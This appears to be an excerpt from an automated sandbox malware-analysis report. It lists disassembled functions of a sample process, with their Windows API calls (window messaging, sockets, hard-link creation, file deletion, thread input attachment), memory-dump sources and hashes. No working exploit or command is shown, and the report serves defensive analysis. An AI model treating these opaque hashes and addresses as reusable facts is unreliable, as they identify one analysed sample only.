                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: cbf4a0e215dd766bb33a367d460eab6349a15d153fb3ef219b7156c781e0a8a6
                                        • Instruction ID: f44ce7840575cc00c0967d9378edf1a70ad94fa1468cd88a6b1354a87fc194c0
                                        • Opcode Fuzzy Hash: cbf4a0e215dd766bb33a367d460eab6349a15d153fb3ef219b7156c781e0a8a6
                                        • Instruction Fuzzy Hash: 2931813124020AAFDF61AF78CC45BEA77A9FB08334F204719F975921D0D7B8AC508760
                                        Function 00784817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0078489F
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007848B3
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 007848D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window
                                        • String ID: SysMonthCal32
                                        • API String ID: 2326795674-1439706946
                                        • Opcode ID: c92c5a8f808d3e115dc73cdf08ae874b0379245818bd5eafe09fc603079cbbe1
                                        • Instruction ID: 04d9338ef3961d6b831dd7cdd31c6b7c79858fef192aa2df9b80bb72d27d9470
                                        • Opcode Fuzzy Hash: c92c5a8f808d3e115dc73cdf08ae874b0379245818bd5eafe09fc603079cbbe1
                                        • Instruction Fuzzy Hash: A021A132640219AFEF259F90CC46FEA3BA9EF48724F110114FA156B1D0D6B9AC558BA0
                                        Function 00784116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0078419F
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007841AF
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007841D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: 4ec6a1cb39e9ff5468bb6fcb35df357fe4638b2e53a18f19c1f24eb15e919cea
                                        • Instruction ID: 6d0ba7c5470cecdfc299c942d080ea061151c38d407ce951492269e98900e1a8
                                        • Opcode Fuzzy Hash: 4ec6a1cb39e9ff5468bb6fcb35df357fe4638b2e53a18f19c1f24eb15e919cea
                                        • Instruction Fuzzy Hash: 3221C53265021DBBEF219F54DC48FFB376EEF99754F108114F9049B190C6B99C9287A0
                                        Function 00784B4A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00784BAE
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00784BC3
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00784BD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: ec1e9445e0daa7be5da014bd55b694916f0949ce1c36a008016789b952d5f691
                                        • Instruction ID: 3f5db2e2f2f13ca3257f2a59de8f14646891f95414c5b09ded06ca388d5e8084
                                        • Opcode Fuzzy Hash: ec1e9445e0daa7be5da014bd55b694916f0949ce1c36a008016789b952d5f691
                                        • Instruction Fuzzy Hash: FE110A71280209BEEF116F65CC06FA77BACEF85714F114515FA55E2090D6B5DC11C714
                                        Function 007861E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00786220
                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0078624D
                                        • DrawMenuBar.USER32(?), ref: 0078625C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw
                                        • String ID: 0
                                        • API String ID: 3227129158-4108050209
                                        • Opcode ID: 15bb81d29a6ac94b0c4254c0d6e7b7b26abd6de5991932a8324e487f7caeadcb
                                        • Instruction ID: e3891c8683f7d12559834d96a8bc631966dd348a86ef47660d8da8672cc2990c
                                        • Opcode Fuzzy Hash: 15bb81d29a6ac94b0c4254c0d6e7b7b26abd6de5991932a8324e487f7caeadcb
                                        • Instruction Fuzzy Hash: 52016931640218EFDB20AF55DC88BAE7BB5FF44751F14809AF849D6190DB7889A4EF21
                                        Function 0075090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c1e12c6faaa68ac332b16d74e5ff2dfc5df51711bfe332ce3e76f19566d744b
                                        • Instruction ID: a71b8b384c6f0cf2f1cbc1335aecd43a467298d4cf6e51c441f73995633268f4
                                        • Opcode Fuzzy Hash: 9c1e12c6faaa68ac332b16d74e5ff2dfc5df51711bfe332ce3e76f19566d744b
                                        • Instruction Fuzzy Hash: 99C17B75A0020AEFDB14CFA4C894EEAB7B5FF48315F208598E805EB251D775EE85CB90
                                        Function 00724210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                        • Instruction ID: b787896db102961d196c1471d77575802acf04ff7b89605ed4c476d99dd7f97f
                                        • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                        • Instruction Fuzzy Hash: 95A16A72A007E6DFEB25DF58E891BAEBBE4EF15310F28416DE5859B282D23C8D41C750
                                        Function 00750CC6 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750E80
                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750E98
                                        • CLSIDFromProgID.OLE32(?,?,00000000,0078DCE0,000000FF,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750EBD
                                        • _memcmp.LIBVCRUNTIME ref: 00750EDE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        • Opcode ID: 969bbcd086af4102258ad35278625ddbcb0742215e2a5a9b54de044d48798e11
                                        • Instruction ID: c65bc1037314ecb67bce09b761e9e0670aa264cc3a2876bb51a884dae21c96c6
                                        • Opcode Fuzzy Hash: 969bbcd086af4102258ad35278625ddbcb0742215e2a5a9b54de044d48798e11
                                        • Instruction Fuzzy Hash: 24810D71A00109EFCB14DFD4C985EEEB7B9FF89315F204558E906AB250DB75AE09CBA0
                                        Function 00772433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 0077245A
                                        • WSAGetLastError.WSOCK32 ref: 00772468
                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007724E7
                                        • WSAGetLastError.WSOCK32 ref: 007724F1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ErrorLast$socket
                                        • String ID:
                                        • API String ID: 1881357543-0
                                        • Opcode ID: 51b31413354ee367091c77569cc13405bf6c9e0fb98464b8eb77324c3f8d7492
                                        • Instruction ID: 5d126f98110f49c74efea41684dd5100f737d0b1ccfdd070ec3b90cc82b17444
                                        • Opcode Fuzzy Hash: 51b31413354ee367091c77569cc13405bf6c9e0fb98464b8eb77324c3f8d7492
                                        • Instruction Fuzzy Hash: 0D41CF74600200AFEB20AF24C896F3A37E5AB04754F54C48CFA299F2D3D776ED428B90
                                        Function 00786BD7 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00786C41
                                        • ScreenToClient.USER32(?,?), ref: 00786C74
                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00786CE1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: 91cb2551d6c292cf8a61e4ac829b7decb921c0a30281d7b5303faa8d423095e7
                                        • Instruction ID: f8828966526a5ead94b9eee9cdab1213ac433a4c2083c3cae81d722a74b99254
                                        • Opcode Fuzzy Hash: 91cb2551d6c292cf8a61e4ac829b7decb921c0a30281d7b5303faa8d423095e7
                                        • Instruction Fuzzy Hash: 74515170A40209EFCF25EF54C9849AE7BB6FF45360F208159F9659B290D774ED81CBA0
                                        Function 00766033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007660DD
                                        • GetLastError.KERNEL32(?,00000000), ref: 00766103
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00766128
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00766154
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 0f54015ed76a2239fa1eb1aba2d68f259cd35b7e5ba5259361568cbab11592ff
                                        • Instruction ID: 31b99d0efdf8fbbf3566ef203986772b3bd0412e5f2caf36e260205fcf3b8b25
                                        • Opcode Fuzzy Hash: 0f54015ed76a2239fa1eb1aba2d68f259cd35b7e5ba5259361568cbab11592ff
                                        • Instruction Fuzzy Hash: 04413939200614DFCB14EF14C554A6EBBE2EF89320B18C088ED5AAB362CB35FD41CB95
                                        Function 00782039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 0078204A
                                          • Part of subcall function 007542CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 007542E6
                                          • Part of subcall function 007542CC: GetCurrentThreadId.KERNEL32 ref: 007542ED
                                          • Part of subcall function 007542CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752E43), ref: 007542F4
                                        • GetCaretPos.USER32(?), ref: 0078205E
                                        • ClientToScreen.USER32(00000000,?), ref: 007820AB
                                        • GetForegroundWindow.USER32 ref: 007820B1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: 382bd0fd95356bcce652747ab616fea6ec035bffc1a7c9560120095a2d450163
                                        • Instruction ID: 48d30d04c6056deb7cfcd45882b6ea126c94da9c08a844cbc42bcc00d7e217fd
                                        • Opcode Fuzzy Hash: 382bd0fd95356bcce652747ab616fea6ec035bffc1a7c9560120095a2d450163
                                        • Instruction Fuzzy Hash: 80317671D00209AFCB54EFA9C885CEEBBFDEF48304B508469E515E7212D675DE45CBA0
                                        Function 0075E7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F4154: _wcslen.LIBCMT ref: 006F4159
                                        • _wcslen.LIBCMT ref: 0075E7F7
                                        • _wcslen.LIBCMT ref: 0075E80E
                                        • _wcslen.LIBCMT ref: 0075E839
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0075E844
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _wcslen$ExtentPoint32Text
                                        • String ID:
                                        • API String ID: 3763101759-0
                                        • Opcode ID: 551782c4d4abe0acb6e5a761fde061e439e9e3788d5d35a35ad1f629fcfbaa4b
                                        • Instruction ID: 05dbca051201c901d1afe65aaaa646ad298739563262fa7ace6bd97839b263f6
                                        • Opcode Fuzzy Hash: 551782c4d4abe0acb6e5a761fde061e439e9e3788d5d35a35ad1f629fcfbaa4b
                                        • Instruction Fuzzy Hash: 7821A871D00214EFCB14DF68C985BEE77F4EF45750F144055ED04AB281D6B89E8587E1
                                        Function 00758184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0075960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00758199,?,000000FF,?,00758FE3,00000000,?,0000001C,?,?), ref: 0075961B
                                          • Part of subcall function 0075960C: lstrcpyW.KERNEL32(00000000,?,?,00758199,?,000000FF,?,00758FE3,00000000,?,0000001C,?,?,00000000), ref: 00759641
                                          • Part of subcall function 0075960C: lstrcmpiW.KERNEL32(00000000,?,00758199,?,000000FF,?,00758FE3,00000000,?,0000001C,?,?), ref: 00759672
                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00758FE3,00000000,?,0000001C,?,?,00000000), ref: 007581B2
                                        • lstrcpyW.KERNEL32(00000000,?,?,00758FE3,00000000,?,0000001C,?,?,00000000), ref: 007581D8
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00758FE3,00000000,?,0000001C,?,?,00000000), ref: 00758213
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 16bb5bdafcd281dc21114eb7bbdd634b0028ba3d11c0df512cc3b5d07e64a4e0
                                        • Instruction ID: 62a0180af25b9f0509e55867c1b30d069a5c6f7853fc19661120f06100ad3ab7
                                        • Opcode Fuzzy Hash: 16bb5bdafcd281dc21114eb7bbdd634b0028ba3d11c0df512cc3b5d07e64a4e0
                                        • Instruction Fuzzy Hash: DA113B3A200305EBCB145F38C859EBA77E5FF84751B50402AFD02C7290EFB99805C391
                                        Function 00788621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0078866A
                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00788689
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007886A1
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0076C10A,00000000), ref: 007886CA
                                          • Part of subcall function 006F2441: GetWindowLongW.USER32(00000000,000000EB), ref: 006F2452
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID:
                                        • API String ID: 847901565-0
                                        • Opcode ID: 16d488439d8f97d613745f6f8714a59f6ccb8fed6176cee492b97fc318f8fd31
                                        • Instruction ID: 428a683fc04470619b585d85f274e7a6f60d4787b47da72e2773a5a515b63c2e
                                        • Opcode Fuzzy Hash: 16d488439d8f97d613745f6f8714a59f6ccb8fed6176cee492b97fc318f8fd31
                                        • Instruction Fuzzy Hash: 6311D5317412159FCB509F28CC08E6637A5BB45370F558328F935D72E1EB399D21CB45
                                        Function 00722099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7316d1634f0b30ba9f03b41f61ea19e0c2ab1d2d9546c3f4dc0d8d38423f761
                                        • Instruction ID: ca9bc2bd9038ee5d44cbfc6adce23fb86b68a27a185ade9dba950dee6e6865d7
                                        • Opcode Fuzzy Hash: e7316d1634f0b30ba9f03b41f61ea19e0c2ab1d2d9546c3f4dc0d8d38423f761
                                        • Instruction Fuzzy Hash: C101A2B26092297EF63126787CC5F27670DDF423B8B310325BA21911D3DA78CD624660
                                        Function 007522B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007522D7
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007522E9
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007522FF
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0075231A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: f7dbdb189b4b4dda61b52b4eac86c167ea469e04fc4957193a8148ab2c5c8c12
                                        • Instruction ID: 2fecd5b5635e12c128b743a648e1eea97d638f8d268c21425ee48b71cb208954
                                        • Opcode Fuzzy Hash: f7dbdb189b4b4dda61b52b4eac86c167ea469e04fc4957193a8148ab2c5c8c12
                                        • Instruction Fuzzy Hash: 7311093A940218FFEB119BA5CD85FDDBBB8EB09750F200091EA00B7291D6B56E11DB94
